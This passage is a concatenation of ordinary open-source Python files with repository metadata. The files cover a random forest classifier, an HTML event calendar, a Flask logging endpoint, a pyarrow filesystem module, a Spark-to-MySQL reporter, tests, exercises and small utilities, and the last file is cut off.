object_sampler : instance of ObjectSampler
n_estimators : int
number of base_estimators
params : kwargs
params for base_estimator initialization
"""
self.n_estimators = n_estimators
self.base_estimator = base_estimator
self.feature_sampler = feature_sampler
self.object_sampler = object_sampler
self.estimators = []
self.indices = []
self.params = params
def fit(self, X, y):
"""
for i in range(self.n_estimators):
1) select random objects and answers for train
2) select random indices of features for current estimator
3) fit base_estimator (don't forget to remain only selected features)
4) save base_estimator (self.estimators) and feature indices (self.indices)
NOTE that self.base_estimator is class and you should init it with
self.base_estimator(**self.params) before fitting
"""
self.estimators = []
self.indices = []
for i in range(self.n_estimators):
X_sampled, y_sampled = self.object_sampler.sample(X, y)
feature_indices = self.feature_sampler.sample_indices(X.shape[1])
estimator = self.base_estimator(**self.params)
estimator.fit(X_sampled[:, feature_indices], y_sampled)
self.estimators.append(estimator)
self.indices.append(feature_indices)
return self
def predict_proba(self, X):
"""
Returns
-------
probas : numpy ndarrays of shape (n_objects, n_classes)
Calculate mean value of all probas from base_estimators
Don't forget, that each estimator has its own feature indices for prediction
"""
if not (0 < len(self.estimators) == len(self.indices)):
raise RuntimeError('Bagger is not fitted', (len(self.estimators), len(self.indices)))
predicts = []
for estimator, feature_indices in zip(self.estimators, self.indices):
predict = estimator.predict_proba(X[:, feature_indices])
predicts.append(predict)
return np.mean(np.array(predicts), axis=0)
def predict(self, X):
"""
Returns
-------
predictions : numpy ndarrays of shape (n_objects, )
"""
return np.argmax(self.predict_proba(X), axis=1)
class RandomForestClassifier(Bagger):
def __init__(self, n_estimators=30, max_objects_samples=0.9, max_features_samples=0.8,
max_depth=None, min_samples_leaf=1, random_state=None, **params):
base_estimator = DecisionTreeClassifier
object_sampler = ObjectSampler(max_samples=max_objects_samples, random_state=random_state)
feature_sampler = FeatureSampler(max_samples=max_features_samples, random_state=random_state)
super().__init__(
base_estimator=base_estimator,
object_sampler=object_sampler,
feature_sampler=feature_sampler,
n_estimators=n_estimators,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
**params,
)
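# Illustrative, hypothetical smoke test of the classes above on a tiny synthetic binary
# problem. It assumes the relative `.sampler` module provides ObjectSampler.sample(X, y)
# and FeatureSampler.sample_indices(n_features) as used in Bagger.fit, and it must be
# run from within the package for the relative import to resolve.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X = rng.randn(200, 8)
    y = (X[:, 0] + X[:, 1] > 0).astype(int)
    clf = RandomForestClassifier(n_estimators=10, max_depth=3, random_state=0)
    clf.fit(X, y)
    preds = clf.predict(X)
    print(preds.shape, (preds == y).mean())   # (200,) and typically accuracy well above 0.5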
|
TotalChest/MLprograms
|
RandomForest/random_forest.py
|
random_forest.py
|
py
| 3,665 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35544157808
|
import calendar
from datetime import datetime
class Util:
DATE_FORMAT = '%Y-%m-%d'
    @staticmethod
    def get_month_start_date(dt):
        return dt.date().replace(day=1)
    @staticmethod
    def get_month_end_date(dt):
        year = dt.year
        month = dt.month
        monthrange = calendar.monthrange(year, month)
        return dt.date().replace(day=monthrange[1])
class CalendarEvent:
def __init__(self, date, event):
self.date = date
self.event = event
class HTMLEventCalendar(calendar.HTMLCalendar):
# CSS classes for the day <td>s
cssclasses = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]
# CSS classes for the day <th>s
cssclasses_weekday_head = cssclasses
# CSS class for the days before and after current month
cssclass_noday = "noday"
# CSS class for the month's head
cssclass_month_head = "month"
# CSS class for the month
cssclass_month = "month"
# CSS class for the year's table head
cssclass_year_head = "year"
# CSS class for the whole year table
cssclass_year = "year"
cssclass_event = "calendar-event"
cssclass_day_number = "day-number"
    def __init__(self, firstweekday=calendar.MONDAY, events=None):
        super().__init__(firstweekday)
        self.events = events if events is not None else {}
def get_event(self, day, month, year):
date = datetime.strptime("{}-{}-{}".format(year, month, day),
Util.DATE_FORMAT)
date_string = date.strftime(Util.DATE_FORMAT)
return self.events.get(date_string, '')
def formatday(self, day, weekday, themonth=None, theyear=None):
"""
Return a day as a table cell.
"""
if day == 0:
# day outside month
return '<td class="%s"> </td>' % self.cssclass_noday
else:
event = self.get_event(day, themonth, theyear)
html = """
<td class="%s">
<div class="%s">%s</div>
<div class="%s">%d</div>
</td>""" % (self.cssclasses[weekday],
self.cssclass_event, event,
self.cssclass_day_number, day)
return html
def formatweek(self, theweek, themonth=None, theyear=None):
"""
Return a complete week as a table row.
"""
s = ''.join(self.formatday(d, wd, themonth, theyear)
for (d, wd) in theweek)
return '<tr>%s</tr>' % s
def formatmonth(self, theyear, themonth, withyear=True):
"""
Return a formatted month as a table.
"""
v = []
a = v.append
a('<table border="0" cellpadding="0" cellspacing="0" class="%s">' % (
self.cssclass_month))
a('\n')
a(self.formatmonthname(theyear, themonth, withyear=withyear))
a('\n')
a(self.formatweekheader())
a('\n')
for week in self.monthdays2calendar(theyear, themonth):
a(self.formatweek(week, theyear=theyear, themonth=themonth))
a('\n')
a('</table>')
a('\n')
return ''.join(v)
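# A minimal rendering sketch (shown as a comment because this file shares its
# name with the stdlib `calendar` module and is meant to be imported as part of
# its package rather than run directly). Events are keyed by 'YYYY-MM-DD'
# strings, which is what get_event() looks up via Util.DATE_FORMAT:
#     events = {'2019-07-04': 'Beach cleanup'}
#     cal = HTMLEventCalendar(events=events)
#     print(cal.formatmonth(2019, 7))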
|
bluepostit/di-python-2019
|
daily-exercises/week9/visitors/calendar.py
|
calendar.py
|
py
| 3,141 |
python
|
en
|
code
| 1 |
github-code
|
6
|
5118772924
|
from flask import current_app, Blueprint,request, jsonify
from vpnresolve import VPNResolve
import json
import logging
logger = logging.getLogger( "ucn_logger" )
ios_api = Blueprint('ios_api', __name__)
@ios_api.route("/viz/ios/log", methods=['POST'])
def log():
vpnres = VPNResolve(current_app.config["CIDR"], {"db":current_app.config["MONGODB"],"collection":current_app.config["VPNLOGSCOLLECTION"],"host":current_app.config["MONGOHOST"], "port":current_app.config["MONGOPORT"]})
host = vpnres.clientip(request)
if host is None:
return jsonify(success="False")
logger.debug("saving ios data for host %s", host)
data = request.get_json(force=False)
logger.debug("received data for host %s" % host)
#shove the processes into the table in bulk!
success= True
if 'processes' in data:
logger.debug("saving ios process data for host %s", host)
success = current_app.config["datadb"].bulk_insert_processes(host,data['processes'])
if success:
logger.debug("sucessfully saved ios process data for host %s", host)
else:
logger.error("failed to save ios process data")
if 'network' in data:
logger.debug("saving ios network for host %s", host)
success = success and current_app.config["datadb"].insert_network_data(host, data['network'])
if success:
logger.debug("sucessfully saved ios network data for host %s", host)
else:
logger.error("failed to save ios network data")
logger.error(data['network'])
return jsonify(success= "True" if success else "False")
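# A wiring sketch with placeholder settings (CIDR, Mongo host/port and the stub
# data store below are illustrative, not the project's real configuration); it
# shows what the handler above expects from app.config, including a `datadb`
# object exposing bulk_insert_processes() and insert_network_data().
if __name__ == '__main__':
    from flask import Flask
    class _StubDataStore:
        def bulk_insert_processes(self, host, processes):
            return True
        def insert_network_data(self, host, network):
            return True
    app = Flask(__name__)
    app.config.update(CIDR="10.0.0.0/8", MONGODB="ucn", VPNLOGSCOLLECTION="vpnlogs",
                      MONGOHOST="localhost", MONGOPORT=27017, datadb=_StubDataStore())
    app.register_blueprint(ios_api)
    app.run(debug=True)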
|
ucn-eu/ucnviz
|
ucnserver/ios.py
|
ios.py
|
py
| 1,522 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5503800628
|
# https://www.hackerrank.com/challenges/np-dot-and-cross/problem
import numpy
numpy.set_printoptions(legacy='1.13')
def zero(size):
return [0 for _ in range(size)]
def get_matrix(size):
matrix = []
for _ in range(size):
matrix.append(list(map(int, input().split())))
return matrix
N = int(input())
matrix1 = numpy.array(get_matrix(N))
matrix2 = numpy.array(get_matrix(N)).transpose()
result = []
for row in range(N):
result.append(zero(N))
for column in range(N):
result[row][column] = int(numpy.dot(matrix1[row], matrix2[column]))
print(numpy.array(result))
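# Optional sanity check: the loop above is ordinary matrix multiplication, so
# numpy.dot on the untransposed inputs produces the same matrix (matrix2 was
# transposed earlier, hence the .transpose() to undo it here).
assert (numpy.array(result) == numpy.dot(matrix1, matrix2.transpose())).all()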
|
Nikit-370/HackerRank-Solution
|
Python/dot-cross.py
|
dot-cross.py
|
py
| 608 |
python
|
en
|
code
| 10 |
github-code
|
6
|
26221879462
|
from pyarrow._fs import ( # noqa
FileSelector,
FileType,
FileInfo,
FileSystem,
LocalFileSystem,
SubTreeFileSystem,
_MockFileSystem,
_normalize_path,
FileSystemHandler,
PyFileSystem,
)
# For backward compatibility.
FileStats = FileInfo
_not_imported = []
try:
from pyarrow._hdfs import HadoopFileSystem # noqa
except ImportError:
_not_imported.append("HadoopFileSystem")
try:
from pyarrow._s3fs import ( # noqa
S3FileSystem, S3LogLevel, initialize_s3, finalize_s3)
except ImportError:
_not_imported.append("S3FileSystem")
else:
initialize_s3()
def __getattr__(name):
if name in _not_imported:
raise ImportError(
"The pyarrow installation is not built with support for "
"'{0}'".format(name)
)
raise AttributeError(
"module 'pyarrow.fs' has no attribute '{0}'".format(name)
)
def _ensure_filesystem(filesystem, use_mmap=False):
if isinstance(filesystem, FileSystem):
return filesystem
# handle fsspec-compatible filesystems
try:
import fsspec
except ImportError:
pass
else:
if isinstance(filesystem, fsspec.AbstractFileSystem):
if type(filesystem).__name__ == 'LocalFileSystem':
# In case its a simple LocalFileSystem, use native arrow one
return LocalFileSystem(use_mmap=use_mmap)
return PyFileSystem(FSSpecHandler(filesystem))
# map old filesystems to new ones
from pyarrow.filesystem import LocalFileSystem as LegacyLocalFileSystem
if isinstance(filesystem, LegacyLocalFileSystem):
return LocalFileSystem(use_mmap=use_mmap)
# TODO handle HDFS?
raise TypeError("Unrecognized filesystem: {}".format(type(filesystem)))
class FSSpecHandler(FileSystemHandler):
"""
Handler for fsspec-based Python filesystems.
https://filesystem-spec.readthedocs.io/en/latest/index.html
>>> PyFileSystem(FSSpecHandler(fsspec_fs))
"""
def __init__(self, fs):
self.fs = fs
def __eq__(self, other):
if isinstance(other, FSSpecHandler):
return self.fs == other.fs
return NotImplemented
def __ne__(self, other):
if isinstance(other, FSSpecHandler):
return self.fs != other.fs
return NotImplemented
def get_type_name(self):
protocol = self.fs.protocol
if isinstance(protocol, list):
protocol = protocol[0]
return "fsspec+{0}".format(protocol)
@staticmethod
def _create_file_info(path, info):
size = info["size"]
if info["type"] == "file":
ftype = FileType.File
elif info["type"] == "directory":
ftype = FileType.Directory
# some fsspec filesystems include a file size for directories
size = None
else:
ftype = FileType.Unknown
return FileInfo(path, ftype, size=size, mtime=info.get("mtime", None))
def get_file_info(self, paths):
infos = []
for path in paths:
try:
info = self.fs.info(path)
except FileNotFoundError:
infos.append(FileInfo(path, FileType.NotFound))
else:
infos.append(self._create_file_info(path, info))
return infos
def get_file_info_selector(self, selector):
if not self.fs.isdir(selector.base_dir):
if self.fs.exists(selector.base_dir):
raise NotADirectoryError(selector.base_dir)
else:
if selector.allow_not_found:
return []
else:
raise FileNotFoundError(selector.base_dir)
if selector.recursive:
maxdepth = None
else:
maxdepth = 1
infos = []
selected_files = self.fs.find(
selector.base_dir, maxdepth=maxdepth, withdirs=True, detail=True
)
for path, info in selected_files.items():
infos.append(self._create_file_info(path, info))
return infos
def create_dir(self, path, recursive):
# mkdir also raises FileNotFoundError when base directory is not found
self.fs.mkdir(path, create_parents=recursive)
def delete_dir(self, path):
self.fs.rm(path, recursive=True)
def _delete_dir_contents(self, path):
for subpath in self.fs.listdir(path, detail=False):
if self.fs.isdir(subpath):
self.fs.rm(subpath, recursive=True)
elif self.fs.isfile(subpath):
self.fs.rm(subpath)
def delete_dir_contents(self, path):
if path.strip("/") == "":
raise ValueError(
"delete_dir_contents called on path '", path, "'")
self._delete_dir_contents(path)
def delete_root_dir_contents(self):
self._delete_dir_contents("/")
def delete_file(self, path):
# fs.rm correctly raises IsADirectoryError when `path` is a directory
# instead of a file and `recursive` is not set to True
if not self.fs.exists(path):
raise FileNotFoundError(path)
self.fs.rm(path)
def move(self, src, dest):
self.fs.mv(src, dest, recursive=True)
def copy_file(self, src, dest):
# fs.copy correctly raises IsADirectoryError when `src` is a directory
# instead of a file
self.fs.copy(src, dest)
def open_input_stream(self, path):
from pyarrow import PythonFile
if not self.fs.isfile(path):
raise FileNotFoundError(path)
return PythonFile(self.fs.open(path, mode="rb"), mode="r")
def open_input_file(self, path):
from pyarrow import PythonFile
if not self.fs.isfile(path):
raise FileNotFoundError(path)
return PythonFile(self.fs.open(path, mode="rb"), mode="r")
def open_output_stream(self, path):
from pyarrow import PythonFile
return PythonFile(self.fs.open(path, mode="wb"), mode="w")
def open_append_stream(self, path):
from pyarrow import PythonFile
return PythonFile(self.fs.open(path, mode="ab"), mode="w")
|
ejnunn/PPE-Object-Detection
|
env/lib/python3.7/site-packages/pyarrow/fs.py
|
fs.py
|
py
| 6,213 |
python
|
en
|
code
| 7 |
github-code
|
6
|
22919129693
|
from io import TextIOWrapper
import os
import argparse
files = [
'Accurect-Pointer.txt',
'Endonasal-RII.txt',
'HeadBand-Reference.txt',
'Navigation-Pointer.txt',
'Registration-Pointer.txt'
]
def readFromOriginalFormat(file: TextIOWrapper):
lines = file.readlines()
for i, line in enumerate(lines):
if line.startswith('Num Markers:'):
numMarkers = int(line.split(':')[1].strip())
if line.startswith('Marker Positions'):
break
data = lines[i+2:i+numMarkers+2]
data = [float(x) for line in data for x in line.split()]
return data, numMarkers
def writeToNewFormat(data: list, numMarkers: int, file: TextIOWrapper):
file.write(str(numMarkers) + '\n')
for i in range(0, numMarkers*3, 3):
file.write('{} {} {}\n'.format(data[i], data[i+1], data[i+2]))
file.write('\n')
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('-d', '--directory', help='root directory of the files', required=True)
args = argparser.parse_args()
    converted_dir = f'{args.directory}/converted'
    if not os.path.exists(converted_dir):
        os.mkdir(converted_dir)
for file in files:
with open(f'{args.directory}/{file}', 'r') as f:
data, numMarkers = readFromOriginalFormat(f)
with open(f'{args.directory}/converted/{file}', 'w') as f:
writeToNewFormat(data, numMarkers, f)
print(f'{file} converted')
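# Example invocation (path is illustrative): the five files listed in `files`
# must already exist under the given directory; converted copies are written to
# <directory>/converted/.
#     python CovertToolPatternFilesFormat.py --directory /path/to/tool/files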
|
odeaxcsh/ParsissCamera
|
Scripts/CovertToolPatternFilesFormat.py
|
CovertToolPatternFilesFormat.py
|
py
| 1,486 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3438407871
|
"""
# Definition for a Node.
class Node:
def __init__(self, val = 0, neighbors = None):
self.val = val
self.neighbors = neighbors if neighbors is not None else []
"""
from collections import deque
class Solution:
def cloneGraph(self, node: 'Node') -> 'Node':
if node is None:
return None
q = deque([node])
cloned_node = Node(node.val)
dic = {node: cloned_node}
while len(q) != 0:
node = q.popleft()
cloned = dic[node]
for neighbor in node.neighbors:
if neighbor not in dic:
dic[neighbor] = Node(neighbor.val)
q.append(neighbor)
cloned.neighbors.append(dic[neighbor])
return cloned_node
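# A small self-check sketch: the judge normally supplies Node, so a local class
# matching the commented definition above is declared here purely for the demo.
if __name__ == '__main__':
    class Node:
        def __init__(self, val=0, neighbors=None):
            self.val = val
            self.neighbors = neighbors if neighbors is not None else []
    a, b = Node(1), Node(2)
    a.neighbors.append(b)
    b.neighbors.append(a)
    clone = Solution().cloneGraph(a)
    print(clone.val, [n.val for n in clone.neighbors])  # 1 [2]
    print(clone is a)                                   # False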
|
cuiy0006/Algorithms
|
leetcode/133. Clone Graph.py
|
133. Clone Graph.py
|
py
| 772 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21112708622
|
from .plugin import Plugin
import js2py
# Plugin name
name = '测试插件'
# Description
description = """
仅供测试
"""
# Author
author = 'kksanyu'
# Whether this plugin is enabled
enable = True
# Demo JS code
jsAddFunc = """
function add(a, b) {
return a + b;
}
"""
class Demo(Plugin):
def run(self, options):
print('运行Demo::run', options.telephone)
        # raise RuntimeError('test exception')
add = js2py.eval_js(jsAddFunc)
a = 1
b = 2
c = add(a, b)
print('计算结果', c)
def instance():
return Demo(name, description, author, enable)
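# A quick exercise sketch (shown as a comment: the relative `.plugin` import
# means this module must be loaded as part of its package). run() only reads
# options.telephone, so a simple namespace stands in for the real options object:
#     from types import SimpleNamespace
#     plugin = instance()
#     plugin.run(SimpleNamespace(telephone='12345678901'))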
|
superdashu/who_are_you
|
plugins/demo.py
|
demo.py
|
py
| 623 |
python
|
en
|
code
| 5 |
github-code
|
6
|
28669919345
|
import json
import unittest
from ..base import AsyncAPITestCase
from yiyun.models import (User, Team, TeamMember, TeamMemberGroup,
Sport, Activity,
ActivityMember, TeamOrder)
from yiyun.service.order import OrderService
class UserOrderTestCase(AsyncAPITestCase):
RETAIN_DATA = False
json_header = True
REQUIRED_MODELS = [Sport, User, Team, TeamMember, TeamMemberGroup,
Activity, ActivityMember, TeamOrder]
LIST_PATH = "api/2/users/self/orders"
ORDER_DETAIL = LIST_PATH + "/{order_no}"
def setUp(self):
super(UserOrderTestCase, self).setUp()
self.initial_data()
def initial_data(self):
self.team_owner = User.create(name='test_activity')
self.team = Team.create(name='club_test_activity',
owner_id=self.team_owner.id)
self.user = self.creator = User.create(name='activity_creator')
self.activity = Activity.create(team=self.team,
creator=self.creator,
price='10', vip_price='8',
leader=self.creator,
title='just a test',
description='description',
start_time='3000-01-01 00:00:01',
end_time='3000-12-31 23:59:59')
self.order = OrderService.new_order(10, self.team, self.user,
TeamOrder.OrderType.ACTIVITY,
TeamOrder.OrderPaymentMethod.WXPAY,
self.activity.id,
title="UserOrderTest"
)
self.activity.add_member(self.user.id,
users_count=1,
price=10,
free_times=0,
total_fee=10,
order_id=self.order.id,
order_no=self.order.order_no,
payment_method=TeamOrder.OrderPaymentMethod.WXPAY,
payment_state=TeamOrder.OrderState.TRADE_BUYER_PAID,
state=TeamMember.TeamMemberState.normal)
def test_list_all_orders(self):
self.auth_user = self.user
response = self.fetch(self.LIST_PATH)
self.assertEqual(200, response.code, response.body.decode())
result = json.loads(response.body.decode())
self.assertIn("orders", result, result)
self.assertNotIn("id", result["orders"][0], result)
def test_order_detail(self):
url = self.ORDER_DETAIL.format(order_no=self.order.order_no)
# 404, not my order
self.auth_user = self.team_owner
response = self.fetch(url)
self.assertEqual(404, response.code, response.body.decode())
# 200
self.auth_user = self.user
response = self.fetch(url)
self.assertEqual(200, response.code, response.body.decode())
result = json.loads(response.body.decode())
self.assertEqual(self.user.id, result["user"]["id"], result)
if __name__ == '__main__':
unittest.main()
|
haoweiking/image_tesseract_private
|
PaiDuiGuanJia/yiyun/tests/rest/order.py
|
order.py
|
py
| 3,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39735696907
|
class BankAccount:
# Class attributes
all_accounts = []
# Constructor for each account
def __init__(self, int_rate=0.05, balance=0):
self.int_rate = int_rate
self.balance = balance
BankAccount.all_accounts.append(self)
def deposit(self, amount):
self.balance += amount
return self
def withdraw(self, amount):
if self.balance - amount >= 0:
self.balance -= amount
return self
else:
print(f"Insufficient funds: Charging a $5 fee")
self.balance -= 5
return self
def display_account_info(self):
print(f"Balance: {self.balance}")
return self
def yield_interest(self):
if self.balance >= 0:
self.balance = self.balance + (self.balance * self.int_rate)
return self
@classmethod
def get_account_info(cls):
for inst in cls.all_accounts:
inst.display_account_info()
account1 = BankAccount()
account2 = BankAccount()
account3 = BankAccount(balance=150)
account1.deposit(10).deposit(20).deposit(1000).withdraw(75).yield_interest()
account2.deposit(300).deposit(150).withdraw(25).withdraw(5).withdraw(255).withdraw(2).yield_interest()
BankAccount.get_account_info()
|
r-lutrick/Coding-Dojo
|
Python/Fundamentals/OOP/Bank_Account/bank_account.py
|
bank_account.py
|
py
| 1,277 |
python
|
en
|
code
| 1 |
github-code
|
6
|
22251439419
|
# For each n, collect every divisor other than 1 and n; print the pair when
# there are exactly two such divisors.
def dell(n):
d = 2
mas = []
while d * d < n:
if n % d == 0:
mas.append(d)
mas.append(n // d)
d += 1
if d * d == n:
mas.append(d)
if len(mas) == 2:
print(*mas)
for i in range(338472, 338494 + 1):
dell(i)
|
MakinFantasy/xo
|
25/10.06/1.py
|
1.py
|
py
| 285 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32727491090
|
import sqlite3
posts = [
{
'author': 'Dova Kin',
'title': 'First Post',
'content': 'First post.',
'date_posted': '20200301'
},
{
'author': 'Angi\'s Cabin',
'title': 'Second Post',
'content': 'Second post.',
'date_posted': '20200302'
},
{
'author': 'Lydia Doorblocker',
'title': 'Third Post',
'content': 'I am sworn to carry your burdens.',
'date_posted': '20200302'
}
]
deletedb = """drop table if exists posts"""
createdb = """create table if not exists posts (
author TEXT NOT NULL,
title TEXT NOT NULL,
content TEXT NOT NULL,
date_posted TEXT NOT NULL
)
"""
insertdb = """
insert into posts ( author, title, content, date_posted) values ( :author, :title, :content, :date_posted )
"""
with sqlite3.connect("posts.db") as conn:
# with sqlite3.connect(":memory:") as conn:
cursor = conn.cursor()
cursor.execute( deletedb )
cursor.execute( createdb )
conn.commit()
cursor.executemany( insertdb, posts )
conn.commit()
cursor.execute("select * from posts")
print(cursor.fetchall())
|
majorgear/flask_blog
|
utils/populate_db.py
|
populate_db.py
|
py
| 1,163 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13202825418
|
import datetime
menu = """
[d] Depositar
[s] Sacar
[e] Extrato
[q] Sair
=> """
saldo = 0
limite = 500
extrato = []
numero_saques = 0
total_saque_diario = 0
LIMITE_SAQUES = 3
while True:
opcao = input(menu)
if opcao == 'd':
valor = input('Valor do depósito (número inteiro e positivo): ')
if valor.isdigit() and int(valor) > 0:
valor = int(valor)
saldo += valor
data_hora = datetime.datetime.now()
extrato.append(('d', valor, data_hora))
print('Depósito realizado com sucesso.')
else:
print(
'Valor de depósito inválido. O valor deve ser um número inteiro positivo.')
elif opcao == 's':
if numero_saques >= LIMITE_SAQUES:
print('Quantidade de saques diários atingido.')
else:
try:
valor = int(input('Valor do saque: '))
if valor > 0 and total_saque_diario + valor <= limite:
if valor > saldo + limite:
print('Saldo insuficiente.')
else:
saldo -= valor
data_hora = datetime.datetime.now()
extrato.append(('s', valor, data_hora))
numero_saques += 1
total_saque_diario = total_saque_diario + valor
print('Saque realizado com sucesso.')
else:
print('Valor limite de saque diário atingido.')
except ValueError:
print('O valor do saque deve ser um número inteiro positivo.')
elif opcao == 'e':
print('\nExtrato Bancário')
print('#####################################################\n')
print('| OP | Data/Hora | Valor')
print('-----------------------------------------------------')
for operacao, valor, data_hora in extrato:
if operacao == 'd':
print(
f'| D | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} | R${valor}')
elif operacao == 's':
print(
f'| S | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} |-R${valor}')
print('-----------------------------------------------------')
print('#####################################################')
print(
f'| Saldo em {data_hora.strftime("%d-%m-%Y %H:%M:%S")} -> R$ {saldo}')
print('#####################################################\n')
elif opcao == 'q':
print('Você saiu do sistema...')
break
else:
print('Opção inválida.')
|
ElPablitoBR/btc-c-d-desafio1
|
desafio.py
|
desafio.py
|
py
| 2,754 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
74843183226
|
# encoding: UTF-8
from ctaStrategyTemplate import *
from ctaObject import CtaBarData
########################################################################
class DataRecorder(CtaStrategyTemplate):
"""
纯粹用来记录历史数据的工具(基于CTA策略),
建议运行在实际交易程序外的一个vn.trader实例中,
本工具会记录Tick和1分钟K线数据。
"""
#----------------------------------------------------------------------
def __init__(self, ctaEngine, name, setting=None):
"""Constructor"""
super(DataRecorder, self).__init__(ctaEngine, name, setting)
self.strategyClassName = 'DataRecorder'
self.author = u'用Python的交易员'
self.tickDbName = 'VtTrader_Tick_Db'
self.barDbName = 'VtTrader_1Min_Db'
self.paramList.append('author')
        # data-recording state
        self.bar = None         # current bar (K-line) object
        self.barMinute = -1     # current minute, initialised to -1
#----------------------------------------------------------------------
def init(self):
"""初始化"""
self.writeCtaLog(u'数据记录工具%s初始化' %self.name)
#----------------------------------------------------------------------
def start(self):
"""启动策略(必须由用户继承实现)"""
self.writeCtaLog(u'数据记录工具%s启动' %self.name)
#----------------------------------------------------------------------
def stop(self):
"""停止策略(必须由用户继承实现)"""
self.writeCtaLog(u'数据记录工具%s停止' %self.name)
#----------------------------------------------------------------------
def onTick(self, tick):
"""收到行情TICK推送"""
# 收到Tick后,首先插入到数据库里
self.insertTick(tick)
# 计算K线
tickMinute = tick.datetime.minute
if tickMinute != self.barMinute: # 如果分钟变了,则把旧的K线插入数据库,并生成新的K线
if self.bar:
self.onBar(self.bar)
bar = CtaBarData() # 创建新的K线,目的在于防止之前K线对象在插入Mongo中被再次修改,导致出错
bar.vtSymbol = tick.vtSymbol
bar.symbol = tick.symbol
bar.exchange = tick.exchange
bar.open = tick.lastPrice
bar.high = tick.lastPrice
bar.low = tick.lastPrice
bar.close = tick.lastPrice
bar.date = tick.date
bar.time = tick.time
            bar.datetime = tick.datetime    # the bar's timestamp is the time of its first tick
            bar.volume = tick.volume
            bar.openInterest = tick.openInterest
            self.bar = bar                  # keep a local alias to avoid an extra attribute lookup
            self.barMinute = tickMinute     # remember the current minute
        else:                               # otherwise keep accumulating into the current bar
            bar = self.bar                  # same local-alias trick for speed
            bar.high = max(bar.high, tick.lastPrice)
            bar.low = min(bar.low, tick.lastPrice)
            bar.close = tick.lastPrice
            bar.volume = bar.volume + tick.volume    # volume accumulates over the minute
            bar.openInterest = tick.openInterest     # open interest is simply overwritten
#----------------------------------------------------------------------
def onOrder(self, order):
"""收到委托变化推送"""
pass
#----------------------------------------------------------------------
def onTrade(self, trade):
"""收到成交推送"""
pass
#----------------------------------------------------------------------
def onBar(self, bar):
"""收到Bar推送"""
self.insertBar(bar)
|
LonelyHunter7/Backtesting_Syestem
|
vn.trader/ctaDataRecorder.py
|
ctaDataRecorder.py
|
py
| 4,091 |
python
|
en
|
code
| 1 |
github-code
|
6
|
42104820373
|
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
class Reporter(object):
def __init__(self, project, src_files, dst_table, keyfile, config):
self.project = project
self.src_files = src_files
self.dst_table = dst_table
self.keyfile = keyfile
self.driver = config.get('mysql', 'driver')
self.url = config.get('mysql', 'url')
self.user = config.get('mysql', 'user')
self.password = config.get('mysql', 'password')
self.jar_dir = config.get('environment', 'jar_dir')
self.submit_host = config.get('environment', 'submit_host')
self.python_lib = config.get('environment', 'python_lib')
self.python_files = self.get_list(config.get('environment', 'python_files'))
def get_list(self, csv):
raw_list = csv.split(',')
stripped_list = [v.strip() for v in raw_list]
return stripped_list
def get_context(self, app_name, project, keyfile, submit_host, python_lib, python_files):
# generate environment variables
full_path_list = ['file:{python_lib}/{file}'.format(python_lib=python_lib, file=file) for file in python_files]
full_paths = ','.join(full_path_list)
python_path = ':'.join(python_files)
# cluster execution
        conf = SparkConf() \
            .setMaster(submit_host) \
            .setAppName(app_name) \
            .set('spark.yarn.dist.files','{full_paths}'.format(full_paths=full_paths)) \
            .setExecutorEnv('PYTHONPATH','{python_path}'.format(python_path=python_path))
        context = SparkContext(conf=conf)
# Setup gcs Hadoop Configurations programmatically
# Require Google Service account
context._jsc.hadoopConfiguration().set("fs.gs.impl", "com.google.cloud.hadoop.fs.gcs.GoogleHadoopFileSystem")
context._jsc.hadoopConfiguration().set("fs.gs.project.id", project)
context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.enable", "true")
context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.json.keyfile", keyfile)
return context
def get_session(self, context):
session = SparkSession.builder \
.config(conf=context.getConf()) \
.getOrCreate()
return session
def get_src_df(self, session, src_files, type='json'):
if type == 'json' :
df = session.read.format("json") \
.option("header", "false") \
.option("inferSchema", "true") \
.load(src_files)
else :
df = session.read.format("csv") \
.option("delimiter", type) \
.option("header", "false") \
.load(src_files)
return df
def write_df_to_mysql(self, df):
df.write.format('jdbc').options(
url=self.url,
driver=self.driver,
dbtable=self.dst_table,
user=self.user,
password=self.password).mode('append').save()
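# A wiring sketch with placeholder settings (hosts, paths and credentials are
# illustrative, not the project's real values); it shows the call order the
# class expects: context -> session -> source dataframe -> MySQL write, and it
# assumes the JDBC driver jar and GCS connector are available to Spark.
if __name__ == '__main__':
    import configparser
    config = configparser.ConfigParser()
    config.read_dict({
        'mysql': {'driver': 'com.mysql.jdbc.Driver',
                  'url': 'jdbc:mysql://localhost:3306/reports',
                  'user': 'reporter', 'password': 'secret'},
        'environment': {'jar_dir': '/opt/jars', 'submit_host': 'yarn',
                        'python_lib': '/opt/pylib', 'python_files': 'engines.py'},
    })
    reporter = Reporter(project='example-gcp-project',
                        src_files='gs://example-bucket/logs/*.json',
                        dst_table='daily_report',
                        keyfile='/path/to/service-account.json',
                        config=config)
    context = reporter.get_context('reporter', reporter.project, reporter.keyfile,
                                   reporter.submit_host, reporter.python_lib,
                                   reporter.python_files)
    session = reporter.get_session(context)
    df = reporter.get_src_df(session, reporter.src_files, type='json')
    reporter.write_df_to_mysql(df)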
|
ubermen/anomaly_detector
|
estimator/reporter/engines.py
|
engines.py
|
py
| 2,795 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10930434466
|
import numpy as np
from os import listdir
from os.path import isfile, isdir, join
import os
import random
cwd = os.getcwd()
data_path = '/data/CUB_200_2011'
savedir = './'
dataset_list = ['base','val','novel']
#if not os.path.exists(savedir):
# os.makedirs(savedir)
folder_list = [f for f in listdir(join(data_path, 'train'))]
classfile_list_all = []
for i, folder in enumerate(folder_list):
classfiles = []
for split in ['train', 'test']:
folder_path = join(join(data_path, split), folder)
classfiles += [join(split, join(folder, cf)) for cf in listdir(folder_path)]
classfile_list_all.append(classfiles)
random.shuffle(classfile_list_all[i])
for dataset in dataset_list:
